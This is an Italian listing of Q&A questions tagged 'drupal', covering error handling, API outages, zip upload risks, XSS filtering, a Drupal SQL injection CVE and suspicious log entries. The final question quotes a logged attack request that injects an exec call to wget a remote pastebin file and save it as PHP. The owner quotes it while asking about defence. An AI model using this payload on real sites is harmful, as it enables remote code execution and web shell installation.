Domande con tag 'drupal'

domande con tag
1
risposta

Posso eseguire una query in un blocco catch di try-catch? [duplicare]

Voglio confermare il giusto approccio all'uso del gestore delle eccezioni try-catch. Ho scritto una query in un blocco try e, se viene lanciata un'eccezione, eseguirà una query in un blocco catch. È questa la strada giusta? try { $...
posta 20.10.2015 - 10:33
1
risposta

Come impedire che il sito web si blocchi perché il servizio web esterno non è disponibile?

Un sito Web di Drupal utilizza il servizio di API di rest esterna. Il problema è che in una rara occasione in cui il servizio API Rest perde il database o si blocca per qualsiasi motivo, ciò causa il rallentamento del sito Web di Drupal. D...
posta 18.10.2017 - 13:48
2
risposte

Potrei imparare di più sulla programmazione dalla decostruzione di drupal piuttosto che continuare con ZF? [chiuso]

Quando stavo decidendo come andare a imparare a progettare applicazioni web PHP, aveva senso sparare verso il centro e andare con Zend Framework in modo che potessi essere più vicino al livello più basso, ma sarei in grado di mettiti al lavoro a...
posta 08.10.2011 - 21:08
4
risposte

Quali sono le minacce alla sicurezza dei caricamenti di file zip e quali azioni preventive dovrebbero essere intraprese?

Abbiamo un'applicazione Drupal sviluppata per condividere file. Stiamo consentendo il caricamento di file zip da parte di un utente del dipartimento connesso. Utilizziamo il file system privato Drupal (al di fuori di webroot). Stiamo uti...
posta 04.04.2013 - 09:38
2
risposte

Filtri drupali XSS con regex. Cosa potrebbe bypassarlo?

Drupal filtra le stringhe HTML contro gli attacchi XSS usando espressioni regolari: link Tuttavia, come molti sanno, HTML non può essere analizzato con espressioni regolari . Il che mi fa pensare che la funzione filter_xss possa co...
posta 02.11.2012 - 16:43
1
risposta

Perché ricevo richieste di url per pagine che non ho mai avuto sul mio sito?

Sul mio sito Drupal ricevo strane richieste di percorsi di URL che non ho mai avuto e che non ho nulla a che fare con il mio sito. Qualcuno potrebbe spiegare perché le persone (oi bot) stanno cercando i seguenti URL? resource-center / news /...
posta 13.10.2015 - 18:59
2
risposte

Drupal Disputed CVE Five Year Tempest - Open Source Security Shortfall?

Qualcuno può aggiungere contesto al problema soggetto? A prima vista, mi sembra che questo problema rappresenti una mancanza fondamentale nelle forze che incoraggiano la codifica sicura nello sviluppo open source. È questo il caso e / o questo e...
posta 29.03.2012 - 17:00
1
risposta

Drupal 7: attacco nei log

Nei miei registri di Drupal 7 vedo voci come: http://example.com/?q=file/ajax/name/%23value/form-tkSDwR6W66a8vR_AIDxAzwMVklkjTkNMjf8SEqfTX8Q Ci sono diverse voci come questa, con solo l'ultima stringa modificata. È di un utente non auten...
posta 18.04.2018 - 21:49
3
risposte

Drupal SQLi solo nel modulo di accesso?

Recentemente, CVE-2014-3704 era nelle notizie. Questa vulnerabilità consente agli aggressori di eseguire SQLi senza la necessità di accedere. Tuttavia, ho cercato gli exploit disponibili e ho trovato solo exploit che fanno uso del modulo di acce...
posta 03.11.2014 - 13:49
2
risposte

Dovrei essere preoccupato per questi tentativi di attacco del nome utente di Drupal 7?

Nei miei log vedo tentativi regolari, alcune volte al giorno come questi: http://www.example.com/user/password?name[%23post_render][0]=exec&name[%23markup]=wget+https%3a%2f%2fpastebin.com%2fraw%2fPeBdUg98+--no-check-certificate+-O+wer.PHP...
posta 21.04.2018 - 21:33